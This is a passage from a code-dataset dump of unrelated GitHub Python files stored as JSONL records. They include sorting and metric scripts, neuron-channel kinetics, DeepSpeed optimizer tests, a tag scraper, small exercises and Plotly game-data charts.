left[i]\n print(f'since {left[i]} is smaller than {right[j]} we will add that to the next value in the list giving us {arr}')\n i += 1\n\n else:\n arr[k] = right[j]\n print(f'since {right[j]} is smaller than {left[i]} we will add that to the next value in the list giving us {arr}')\n j += 1\n k += 1\n\n if i == len(left):\n print('Since we finished with left now we need to add the rest of right')\n while j< len(right):\n arr[k] = right[j]\n k += 1\n j += 1\n else:\n print('Since we finished with left now we need to add the rest of right')\n while i < len(left):\n arr[k] = left[i]\n k += 1\n i += 1\n \n print(f'Ourproduct: {arr}')\n \n return arr\n\nunsorted_arr = [8,4,23,42,16,15]\n\nmerge_sort(unsorted_arr)\n","repo_name":"wildwoodwaltz/data-structures-and-algorithms","sub_path":"sorting/merge/merge_sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15208822627","text":"#Author: Anal Kumar\n#Defines the channel kinetics\n\nimport moose\nimport rdesigneur as rd\nimport numpy as np\nimport csv\n\nSOMA_A = 4*np.pi*0.5e-6**2\nF = 96485.3329\nR = 8.314\nTemp = 307.15\ndt = 0.05e-3\nENa = 0.055\nEK = -0.075 #EK for KDR is set to -0.077\nECa = 0.50\nEm = -0.045\nVmin = -0.100\nVmax = 0.100\nVdivs = 3000\ndV = (Vmax-Vmin)/Vdivs\nCamin = 0\nCamax = 3e-3\nCadivs = 3000\ndCa = (Camax-Camin)/Cadivs\n\n\ndef Na_SChan(name):\n Na_S = moose.HHChannel( '/library/' + name )\n Na_S.Ek = ENa\n Na_S.Gbar = 300.0*SOMA_A\n Na_S.Gk = 0.0\n Na_S.Xpower = 3.0\n Na_S.Ypower = 1.0\n Na_S.Zpower = 1.0\n\n tha = -25e-3\n qa = 7.2e-3\n Ra = 0.4e3\n Rb = 0.124e3\n thi1 = -45e-3\n thi2 = -45e-3\n qd = 1.5e-3\n qg = 1.5e-3\n mmin=0.02\n hmin=0.5\n q10=3\n Rg = 0.01e3\n Rd = 0.03e3\n qq = 10e-3\n tq = -55e-3\n thinf = -50e-3\n qinf = 2e-3\n vhalfs=-60e-3\n a0s=0.0003e3\n zetas=12\n gms = 0.2\n smax=10e-3\n vvh=-58e-3\n vvs=2e-3\n ar2=1\n celsius = 34\n\n v = np.arange(Vmin,Vmax+dV, dV)\n alpv = 1/(1+np.exp((v-vvh)/vvs))\n alps = np.exp(zetas*(v-vhalfs)*9.648e4/(8.315*(273.16+celsius)))\n bets = np.exp(zetas*gms*(v-vhalfs)*9.648e4/(8.315*(273.16+celsius)))\n qt=q10**((celsius-24)/10)\n\n a = Ra * (v - tha) / (1 - np.exp(-(v - tha)/qa))\n a[abs(v-tha)<=1e-9] = Ra*qa\n b = Rb * (-v + tha) / (1 - np.exp(-(-v + tha)/qa))\n b[abs(v-tha)<=1e-9] = Rb*qa\n mtau = 1e-3/(a+b)/qt\n mtau[mtau pre[j]:\n auc += 1\n elif pre[i] == pre[j]:\n auc += 0.5\nauc = auc * 1.0 / (len(pos)*len(neg))\nprint(auc)","repo_name":"hcy700/train","sub_path":"auc.py","file_name":"auc.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12915522453","text":"# -*- coding: UTF-8 -*-\n\nfrom sklearn.metrics import classification_report\n\nimport itertools\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\n \n\n \n\n#將繪制圖表的部份程式碼整理程一個函式,方便調用:\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks 
= np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\n\ndef main():\n y_predict = m.predict(X_test, batch_size=None, verbose=0, steps=None)\n\n y_pred = convert_to_labels(y_predict)\n y_true = convert_to_labels(y_test)\n target_names = [ 'Hunger','Sleepy' ,'Diaper','Painful']\n print (\"month = \" + str(month))\n print(classification_report(y_true, y_pred, target_names=target_names))\n print (\"**************************************************************\")\n\n plt.figure()\n cnf_matrix = confusion_matrix(y_true, y_pred)\n plot_confusion_matrix(cnf_matrix, classes=target_names,normalize=True,\n title=\"month = \" + str(month) + ' confusion matrix')\n\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"khsthomas/Blog-samples","sub_path":"deeplearning/analysis/plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"36681562015","text":"import sys\nsys.stdout = open(\"02 A Layer of Neurons.txt\", \"w\")\n\ninputs = [1, 2, 3, 2.5]\nprint(\"Inputs :\", inputs, \"\\n\")\n\nweights1 = [0.20, 0.80, -0.5, 10]\nweights2 = [0.50, -0.91, 0.26, -0.50]\nweights3 = [-0.26, -0.27, 0.17, 0.87]\nprint(f\"We have 3 neurons so we have 3 sets/lists of weights and for {len(inputs)} inputs :\", \"\\n\")\nprint(\"Weights for 1st neuron :\", weights1, \"\\n\")\nprint(\"Weights for 2nd neuron :\", weights2, \"\\n\")\nprint(\"Weights for 3rd neuron :\", weights3, \"\\n\")\n\nbias1 = 2\nbias2 = 3\nbias3 = 0.5\nprint(\"Similarly, 3 bias, 1 for each neuron :\", \"\\n\")\nprint(\"Bias for 1st neuron :\", bias1, \"\\n\")\nprint(\"Bias for 2nd neuron :\", bias2, \"\\n\")\nprint(\"Bias for 3rd neuron :\", bias3, \"\\n\")\n\noutput = ((inputs[0]*weights1[0] + inputs[1]*weights1[1] + inputs[2]*weights1[2] + inputs[3]*weights1[3] + bias1),\n (inputs[0]*weights2[0] + inputs[1]*weights2[1] + inputs[2]*weights2[2] + inputs[3]*weights2[3] + bias2),\n (inputs[0]*weights3[0] + inputs[1]*weights3[1] + inputs[2]*weights3[2] + inputs[3]*weights3[3] + bias3))\nprint(\"Layer output :\", output, \"\\n\")\n\nprint(\"In the above code, we have three sets of weights and three biases, which define three neurons. Each neuron is “connected” to the same inputs. \\n\"\n \"The difference is in the separate weights and bias that each neuron applies to the input. This is called a fully connected neural \\n\"\n \"network — every neuron in the current layer has connections to every neuron from the previous layer. 
This is a very common type of neural network, \\n\"\n \"but it should be noted that there is no requirement to fully connect everything like this.\\n\")\n\n# Let's write a similar function to our previous exercise to calculate output of a layer of neurons\ndef layer_output(inputs, weights, biases):\n layer_output = []\n for neuron_weights, neuron_bias in zip(weights, biases):\n neuron_output = 0\n for neuron_input, weight in zip(inputs, neuron_weights):\n neuron_output += neuron_input*weight\n neuron_output += neuron_bias\n layer_output.append(neuron_output)\n return layer_output\n\nLayer_Output = layer_output(inputs, [weights1, weights2, weights3], [bias1, bias2, bias3])\nprint(\"Layer Output using a function:\", Layer_Output, \"\\n\")\n\nsys.stdout.close()\n","repo_name":"srimanikantaarjun/Neural-Networks-from-Scratch","sub_path":"Coding_Our_First_Neurons/02 A Layer of Neurons.py","file_name":"02 A Layer of Neurons.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33945251042","text":"from .constants import *\nimport os\n\n\ndef indexOf(string, target, idx=0):\n try:\n return string.index(target, idx)\n except ValueError:\n return -1\n\n\ndef getLastEdit(path):\n try:\n return os.path.getmtime(path)\n except:\n return 0\n\n\ndef listdir(path):\n try:\n return sorted(\n [os.path.join(path, d) for d in os.listdir(path)],\n key = getLastEdit, reverse = True\n )\n except:\n return []\n\n\ndef FindLoLPath():\n for i in range(26):\n rootChr = chr(65+i)\n print(rootChr)\n if not os.path.exists(f\"{rootChr}:\\\\\"): continue\n\n now = []\n nxt = []\n for child in listdir(f\"{rootChr}:\\\\\"):\n if os.path.isdir(child):\n now.append(child)\n\n while(len(now) != 0):\n for path in now:\n if (LOL_PATH_TARGET1 in path) or (LOL_PATH_TARGET2 in path):\n return path\n\n for child in listdir(path):\n if os.path.isdir(child):\n nxt.append(child)\n\n now = nxt\n nxt = []\n return \"\"\n","repo_name":"LeeFuuChang/LoL-Check","sub_path":"interface/modules/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5261834925","text":"# declare a mapping and the models used\n\nfrom __future__ import print_function\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Date, String, Float, Integer\n\nBase = declarative_base()\n\n\nclass Stock(Base):\n __tablename__ = 'stocks'\n date = Column(Date, primary_key = True)\n code = Column(String, primary_key = True)\n ey = Column(Float)\n roc = Column(Float)\n pe = Column(Float)\n roe = Column(Float)\n pc = Column(Float)\n\n ey_order = Column(Integer)\n roc_order = Column(Integer)\n gb_eyroc_order = Column(Integer)\n\n pe_order = Column(Integer)\n roe_order = Column(Integer)\n gb_peroe_order = Column(Integer)\n\n sector = []\n @classmethod\n def add(cls, self):\n cls.sector.append(self)\n\n def __repr__(self):\n return '' % (self.code)\n\n ######## P/E and ROE class methods #######\n # sort from low to high\n @classmethod\n def sort_pe(cls):\n # | pe |\n # | pe_ok | pe_rotten |\n # 0------->----------->\n # + -\n\n pe_ok = []\n pe_rotten = []\n\n for s in cls.sector:\n if s._pe >= 0:\n pe_ok.append(s)\n else:\n pe_rotten.append(s)\n\n pe_ok.sort(key=lambda s: s._pe)\n pe_rotten.sort(key=lambda s: s._pe, reverse=True)\n pe = pe_ok + pe_rotten\n\n for i, s in enumerate(pe, start=1):\n s.pe_order = 
i\n\n # sort from high to low\n @classmethod\n def sort_roe(cls):\n # | roe |\n # | roe_ok | roe_rotten |\n # <--------0------------>\n # + -\n\n roe_ok = []\n roe_rotten = []\n\n for s in cls.sector:\n if s._roe >= 0:\n roe_ok.append(s)\n else:\n roe_rotten.append(s)\n\n roe_ok.sort(key=lambda s: s._roe, reverse=True)\n roe_rotten.sort(key=lambda s: s._roe, reverse=True)\n roe = roe_ok + roe_rotten\n\n for i, s in enumerate(roe, start=1):\n s.roe_order = i\n\n # sort from low to high\n @classmethod\n def sort_gb_peroe(cls):\n # | greenblatt |\n # 0------------>\n # +\n\n for s in cls.sector:\n s.gb_peroe_order = s.pe_order + s.roe_order\n\n cls.sector.sort(key=lambda s: s.gb_peroe_order)\n\n ######## EY and ROC class methods #######\n # ey\n @classmethod\n def sort_ey(cls):\n ey = []\n\n for s in cls.sector:\n ey.append(s)\n\n ey.sort(key=lambda s: s._ey, reverse=True)\n\n for i, s in enumerate(ey, start=1):\n s.ey_order = i\n\n # roc\n @classmethod\n def sort_roc(cls):\n roc = []\n\n for s in cls.sector:\n roc.append(s)\n\n roc.sort(key=lambda s: s._roc, reverse=True)\n\n for i, s in enumerate(roc, start=1):\n s.roc_order = i\n\n # sort greenblatt\n @classmethod\n def sort_gb_eyroc(cls):\n gb_eyroc_order = []\n\n for s in cls.sector:\n s.gb_eyroc_order = s.ey_order + s.roc_order\n\n cls.sector.sort(key=lambda s: s.gb_eyroc_order)\n","repo_name":"dbolgheroni/idigger","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73839952787","text":"\"\"\"\nВариант 21.\nВ озере водится несколько видов рыб. Три рыбака поймали рыб некоторых их имеющихся\nв озере видов. Определить, рыб каких видов поймал каждый рыбак и рыб каких видов,\nимеющихся в озере, не выловил ни один из рыбаков.\nСкляров Владимир Дмитриевич..\n\"\"\"\nimport random #Импортирование библиотеки рандом\n\nfish_osero = {\"окунь\", \"карась\", \"лещ\", \"щука\", \"язь\", \"карп\", \"сом\", \"судак\", \"Ерш\", \"Плотва\", \"Амур\",\n \"Красноперка\", \"Толстолобики\", \"Берш\"} #множество в котором хранятся все виды рыб в озере.\nribak_1 = {random.choice(list(fish_osero)) for i in range(random.randint(1, len(fish_osero)))} #генератор рандомных рыб\nribak_2 = {random.choice(list(fish_osero)) for n in range(random.randint(1, len(fish_osero)))}\nribak_3 = {random.choice(list(fish_osero)) for d in range(random.randint(1, len(fish_osero)))}\none = (ribak_3 & ribak_2) & ribak_1 #Проверка какие элементы имеются во всех 3 множествах\nif one == set(): # Проверка условия если множество пустое = 0\n one = 0 # значение переменной one меняем на 0.\nthree = (((fish_osero - ribak_1) - ribak_2) - ribak_3) #Переменная ссылается на проверку, какие элементы отсутствуют\n\n'''Вывод данных.'''\nprint(f\"Все виды рыб: {fish_osero}\")\nprint(\"Виды рыб которые поймали каждые рыбаки:\", one)\nprint(\"Виды рыб которые не поймал ни 1 из рыбаков: \", three)\nprint(\"Виды рыб которые поймал Первый рыбак:\", ribak_1)\nprint(\"Виды рыб которые поймал Второй рыбак:\", ribak_2)\nprint(\"Виды рыб которые поймал Третий рыбак:\", ribak_3)\n","repo_name":"Foo0s/Proj_1sem_Sklyarov","sub_path":"PZ_10/PZ_10.py","file_name":"PZ_10.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32587145301","text":"sandwich_orders = ['pastrami','tuna','pastrami','ham and cheese','carbonara','egg','pastrami']\nfinished_sandwiches = 
[]\n\nprint(\"The Deli has run out of pastrami.\")\n\nwhile sandwich_orders:\n\tsandwich = sandwich_orders.pop()\n\tif sandwich == 'pastrami':\n\t\tsandwich_orders.remove('pastrami')\n\telse:\n\t\tprint(f\"I made your {sandwich.title()} sandwich\")\n\t\tfinished_sandwiches.append(sandwich)\n\nprint(finished_sandwiches)","repo_name":"Rauada/python_work","sub_path":"examples/deli.py","file_name":"deli.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"29034822757","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport sqlite3\n\nnowtime = datetime.now()\ndb = sqlite3.connect(f'Tags_[{nowtime.year}-{nowtime.month}-{nowtime.day}].db')\ncursor = db.cursor()\n\ntable_cr = '''\nCREATE TABLE IF NOT EXISTS Tags (\n    Prefix varchar(255),\n    Tag varchar(255),\n    PostLength int\n)\n'''\n\ncursor.execute(table_cr)\ndb.commit()\n\nFEMALE = '♀'\nMALE = '♂'\n\nfor alphabet_num in range(ord('a'), ord('z')+1):\n    api_url = f'https://hitomi.la/alltags-{chr(alphabet_num)}.html'\n    print(f'SENT GET TO {api_url}')\n    response = requests.get(api_url)\n    soup = BeautifulSoup(response.content, 'html.parser')\n    for posts in soup.find_all('ul', {'class': 'posts'}):\n        for item in posts.find_all('li', recursive=False):\n            tag = item.get_text()\n            tag = tag.replace(\" \", \"_\")\n            tag_num = tag[tag.index('(')+1:tag.index(')')]\n            tag = tag[:tag.index('(')]\n            prefix = \"tag\"\n            if FEMALE in tag:\n                prefix = \"female\"\n                tag = tag[:tag.index(FEMALE)]\n            elif MALE in tag:\n                prefix = \"male\"\n                tag = tag[:tag.index(MALE)]\n            if tag[-1] == '_':\n                tag = tag[:-1]\n            print(f'(\"{prefix}\", \"{tag}\", {tag_num})')\n            cursor.execute(f'INSERT INTO Tags VALUES (\"{prefix}\", \"{tag}\", {tag_num})')\ndb.commit()","repo_name":"sserve-kr/HitomiTagCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"38944234060","text":"from diary.skill import texts\n\n\nclass TestMarks:\n    def test_full(self, studentDmitry, full_journal):\n        text, tts = texts.marks_for_student(studentDmitry, full_journal)\n        assert (\n            text\n            == \"Дмитрий\\nРусский язык. Изложение 2, 4\\nМатематика. Опоздание. Работа на уроке 3\\nХимия. Прогул\"\n        )\n        assert (\n            tts\n            == \"У дмитрия sil<[200]>Русский язык. Изложение 2 и 4 sil<[200]>Математика. Опоздание. Работа на уроке 3 sil<[200]>Химия. Прогул\"\n        )\n\n    def test_empty(self, studentDmitry):\n        text, tts = texts.no_marks(studentDmitry)\n        assert text == \"Дмитрий. Нет записей\"\n        assert tts == \"По дмитрию нет записей в журнале\"\n\n\nclass TestHomework:\n    def test_no_homework(self, studentDmitry):\n        text, tts = texts.homework_for_student(studentDmitry, [])\n\n        assert text == \"Дмитрий. Нет домашнего задания.\"\n        assert tts.lower() == \"у дмитрия нет домашнего задания.\"\n\n    def test_some_homework(self, studentDmitry):\n        homework = [(\"География\", \"стр. 45\")]\n\n        text, tts = texts.homework_for_student(studentDmitry, homework)\n\n        assert \"Дмитрий. 1 задание.\" in text\n        assert \"у дмитрия 1 задание.\" in tts.lower()\n\n        assert \"География. стр. 
45\" in text\n assert \"страница 45\" in tts.lower()\n","repo_name":"KrapivinAndrey/AliceDiaryNew","sub_path":"tests/test_texts.py","file_name":"test_texts.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25778701561","text":"from unittest import TestCase\nfrom pixabay import Image, Video\nimport os\n\napi_key = os.getenv('PIXABAY_API_KEY')\nimage = Image(api_key)\nvideo = Video(api_key)\n\n\nclass TestPythonPixabay(TestCase):\n def test_custom_image_search(self):\n self.assertIn(\n \"hits\",\n image.search(q=\"water\",\n page=1,\n safesearch=\"true\",\n editors_choice=\"true\"))\n self.assertEqual(\n image.search(q=\"apple\", page=1)[\"hits\"][0][\"pageURL\"],\n \"https://pixabay.com/photos/apples-fruit-red-juicy-ripe-634572/\"\n )\n self.assertEqual(\n image.search(q=\"apple\",\n page=1,\n safesearch=\"false\",\n editors_choice=\"true\")[\"totalHits\"], 155)\n\n def test_custom_video_search(self):\n self.assertEqual(\n video.search(q=\"apple\",\n page=1,\n safesearch=\"false\",\n editors_choice=\"true\")[\"hits\"][0][\"pageURL\"],\n \"https://pixabay.com/videos/id-1019/\")\n self.assertEqual(\n video.search(q=\"apple\",\n page=1,\n safesearch=\"true\",\n editors_choice=\"true\")[\"totalHits\"], 1)\n","repo_name":"DoNnMyTh/pixabay","sub_path":"test/test_python_pixabay.py","file_name":"test_python_pixabay.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20461510377","text":"import torch\nimport numpy as np\nimport pytest\nfrom cpuinfo import get_cpu_info\nimport os\n\nimport deepspeed\nfrom deepspeed.ops.adam import FusedAdam\nfrom deepspeed.ops.op_builder import CPUAdamBuilder\n\nif not deepspeed.ops.__compatible_ops__[CPUAdamBuilder.NAME]:\n pytestmark = pytest.mark.skip(\n reason=\"cpu-adam is not compatible\")\n\nif bool(pytest.use_hpu) == True:\n from habana_frameworks.torch.utils.library_loader import load_habana_module\n\n\npytest.cpu_vendor = get_cpu_info()[\"vendor_id_raw\"].lower()\n\n\ndef check_equal(first, second, atol=1e-2, verbose=False):\n x = first.detach().numpy()\n y = second.detach().numpy()\n print(\"ATOL\", atol)\n if verbose:\n print(\"x = {}\".format(x.flatten()))\n print(\"y = {}\".format(y.flatten()))\n print('-' * 80)\n np.testing.assert_allclose(x, y, err_msg=\"param-update mismatch!\", atol=atol)\n\n\n@pytest.mark.parametrize('dtype', [torch.half, torch.float], ids=[\"fp16\", \"fp32\"])\n@pytest.mark.parametrize('model_size',\n [\n (64),\n (22),\n #(55),\n (128),\n (1024),\n (1048576),\n ]) # yapf: disable\ndef test_cpu_adam_opt(dtype, model_size):\n if (\"amd\" in pytest.cpu_vendor) and (dtype == torch.half):\n pytest.skip(\"cpu-adam with half precision not supported on AMD CPUs\")\n if dtype==torch.float16 and bool(pytest.use_hpu) == True and os.getenv(\"REPLACE_FP16\", default = None):\n dtype=torch.bfloat16\n from deepspeed.ops.adam import DeepSpeedCPUAdam\n device = 'cpu'\n rng_state = torch.get_rng_state()\n param = torch.nn.Parameter(torch.randn(model_size, device=device).to(dtype))\n torch.set_rng_state(rng_state)\n param1_data = torch.randn(model_size, device=device)\n param1 = torch.nn.Parameter(param1_data)\n torch.set_rng_state(rng_state)\n if bool(pytest.use_hpu) == True:\n param2_data = torch.randn(model_size, device=device).to(dtype).to('hpu')\n else:\n param2_data = torch.randn(model_size, device=device).to(dtype).cuda()\n param2 = 
torch.nn.Parameter(param2_data)\n\n optimizer1 = torch.optim.AdamW([param1])\n if pytest.use_hpu:\n from habana_frameworks.torch.hpex.optimizers import FusedAdamW\n optimizer2 = FusedAdamW([param2])\n else:\n optimizer2 = FusedAdam([param2])\n optimizer = DeepSpeedCPUAdam([param])\n\n for i in range(10):\n rng_state = torch.get_rng_state()\n param.grad = torch.randn(model_size, device=device).to(dtype)\n torch.set_rng_state(rng_state)\n param1.grad = torch.randn(model_size, device=device)\n torch.set_rng_state(rng_state)\n if bool(pytest.use_hpu) == True:\n param2.grad = torch.randn(model_size, device=device).to(dtype).to('hpu')\n else:\n param2.grad = torch.randn(model_size, device=device).to(dtype).cuda()\n\n optimizer.step()\n optimizer2.step()\n optimizer1.step()\n tolerance = param1.float().norm().detach().numpy() * 1e-2\n check_equal(param.float().norm(),\n param1.float().norm(),\n atol=tolerance,\n verbose=True)\n check_equal(param.float().norm(),\n param2.float().cpu().norm(),\n atol=tolerance,\n verbose=True)\n\n\ndef test_cpu_adam_gpu_error():\n model_size = 64\n from deepspeed.ops.adam import DeepSpeedCPUAdam\n if bool(pytest.use_hpu) == True:\n device = 'hpu:0'\n else:\n device = 'cuda:0'\n param = torch.nn.Parameter(torch.randn(model_size, device=device))\n optimizer = DeepSpeedCPUAdam([param])\n\n param.grad = torch.randn(model_size, device=device)\n with pytest.raises(AssertionError):\n optimizer.step()\n","repo_name":"mlcommons/training_results_v3.0","sub_path":"Intel-HabanaLabs/benchmarks/gpt3/deepspeed-fork/tests/unit/ops/adam/test_cpu_adam.py","file_name":"test_cpu_adam.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"4378339314","text":"with open('day12.txt') as f:\n input_data = f.read().split('\\n')\n input_data = [(i[0], int(i[1:])) for i in input_data if i != '']\n\nprint(input_data)\n\ndirections = {'N': (0, 1),\n 'S': (0, -1),\n 'E': (1, 0),\n 'W': (-1, 0),\n }\n\nrotations = {\n 'R': 1,\n 'L': -1\n }\n\nninety_degree = {'N': {'R': 'E', 'L': 'W'},\n 'S': {'R': 'W', 'L': 'E'},\n 'E': {'R': 'S', 'L': 'N'},\n 'W': {'R': 'N', 'L': 'S'},\n }\n\ndef add_on_vector(place, direction, steps):\n return (\n place[0] + (direction[0] * steps),\n place[1] + (direction[1] * steps)\n )\n\n\ndef rotate(direction, rotation_direction, rotation_degrees):\n no_rotations = int(rotation_degrees / 90)\n x, y = direction\n for i in range(no_rotations):\n x,y = (y * rotations[rotation_direction], -x * rotations[rotation_direction])\n return x,y\n\n\n# Part 1\n'''\nplace = (0,0)\ndirection = (1, 0)\n\nfor i in input_data:\n print(place, direction)\n if i[0] in ['R', 'L']:\n direction = rotate(direction, i[0], i[1])\n elif i[0] == 'F':\n place = add_on_vector(place, direction, i[1])\n elif i[0] in ['N', 'S', 'E', 'W']:\n place = add_on_vector(place, directions[i[0]], i[1])\n\nprint(place)\n'''\n\n# Part 2\n\nplace = (0,0)\nwaypoint = (10,1)\n\nfor i in input_data:\n print(place, waypoint, i)\n if i[0] in ['R', 'L']:\n waypoint = rotate(waypoint, i[0], i[1])\n elif i[0] == 'F':\n place = add_on_vector(place, waypoint, i[1])\n elif i[0] in ['N', 'S', 'E', 'W']:\n waypoint = add_on_vector(waypoint, directions[i[0]], i[1])\n\nprint(place, waypoint)\n","repo_name":"samjbasak/advent-of-code-2020","sub_path":"Day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
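A minimal sketch of the quarter-turn rotation used in the day12.py record above — not a dataset record, and it assumes nothing beyond that sample's own rule that one clockwise 90-degree turn ("R") maps a vector (x, y) to (y, -x):

def rotate_cw(x, y, quarter_turns):
    # apply the clockwise 90-degree map (x, y) -> (y, -x) repeatedly
    for _ in range(quarter_turns % 4):
        x, y = y, -x
    return x, y

# east (1, 0) turned R90 points south (0, -1); the part-2 starting
# waypoint (10, 1) turned R180 lands at (-10, -1)
assert rotate_cw(1, 0, 1) == (0, -1)
assert rotate_cw(10, 1, 2) == (-10, -1)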
+{"seq_id":"43795866885","text":"import sqlite3\nimport pandas as pd\nimport plotly.express as exp\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom math import ceil\n\nfrom queries import (team_build_type_query, team_build_type_by_users_and_bots_query,\n team_build_type_by_maps_query, ship_effectivity_query)\n\ncon = sqlite3.connect(\"Dataset.db\")\n\n# Запрос о количестве участников, выбравших тот или иной тип боя\"\nquery = team_build_type_query\n\n# Получаем датафрейм и строим круговую диаграмму\ndf = pd.read_sql(query, con)\n\nfig = exp.pie(df, values=\"amount_members\", names=\"team_build_type\",\n title=\"Популярность типов боя среди игроков\",\n width=800, height=800)\nfig.update_layout(title_x=0.5, title_font=dict(size=26))\nfig.update_traces(textinfo='value+percent', textfont_size=14)\nfig.show()\n\n# Запрос о количестве участников, выбравших тот или иной тип боя сгруппированный среди реальных пользователей и ботов\"\nquery_1 = team_build_type_by_users_and_bots_query\n\n# Получаем датафрейм и строим две совмещенные круговые диаграммы\ndf_1 = pd.read_sql(query_1, con)\n\nfig = make_subplots(rows=1, cols=2, specs=[[{'type': 'domain'}, {'type': 'domain'}]])\nfig.add_trace(go.Pie(labels=df_1[\"team_build_type\"], values=df_1[df_1[\"users\"] == 1][\"amount_members\"], name=\"Users\"),\n 1, 1)\nfig.add_trace(go.Pie(labels=df_1[\"team_build_type\"], values=df_1[df_1[\"users\"] == 0][\"amount_members\"], name=\"Bots\"),\n 1, 2)\n\nfig.update_traces(hole=.3, hoverinfo=\"label+percent+name\", textinfo='value+percent', textfont_size=14)\n\nfig.update_layout(\n title_text=\"Популярность типов боя среди пользователей и ботов\",\n width=1200, height=800,\n title_x=0.5, title_font=dict(size=26),\n annotations=[dict(text='Users', x=0.19, y=0.5, font_size=22, showarrow=False),\n dict(text='Bots', x=0.8, y=0.5, font_size=22, showarrow=False)])\nfig.show()\n\n# Запрос о количестве разных типов боев, сгруппированных по типам карт\nquery_2 = team_build_type_by_maps_query\n\n# Получаем датафрейм и строим точечную диаграмму распределения количетсва разных типов боев для разных карт\ndf_2 = pd.read_sql(query_2, con)\n\nfig = exp.scatter(data_frame=df_2, x=\"map_type\", y=\"amount\", color=\"team_build_type\",\n title=\"Распределение колчества разных типов боев в зависимости от типа карты\",\n width=1200, height=700)\n\nfig.update_traces(marker_size=10)\nfig.update_layout(title_x=0.5, title_font=dict(size=26))\nfig.update_yaxes(dtick=500, title_font={'size': 16}, title_text='Amount of arenas')\nfig.update_xaxes(title_font={'size': 16}, title_text='Maps type')\n\nfig.show()\n\n# Запрос для анализа эффективности кораблей\nquery_3 = ship_effectivity_query\n\n# Получим датафрейм и добавим к нему колонку, объединяющую название корабля и страну\ndf_3 = pd.read_sql(query_3, con)\ndf_3[\"name\"] = df_3['ship_name'] + ', ' + df_3['country']\n\n# Строим горизонтальные столбчатые диаграммы c цветовой палитрой, от зеленого - лучшие показатели, до красного - худшие\nship_classes = list(df_3[\"ship_class\"].unique())\nheigths = []\nfor ship_class in ship_classes:\n data = df_3[df_3[\"ship_class\"] == ship_class]\n heigths.append(len(data) / len(df_3))\n\nparams = [\"alived\", \"winner\", \"frags\", \"positive_damage\", \"avg(exp)\", \"avg(distance)\"]\nmins = list(map(min, [df_3[param] for param in params]))\nmaxs = list(map(max, [df_3[param] for param in params]))\n\ncolumn_titles = [\"Процент выживаемости\", \"Процент побед\", \"Среднее кол-во фрагов\",\n \"Сред. положит. 
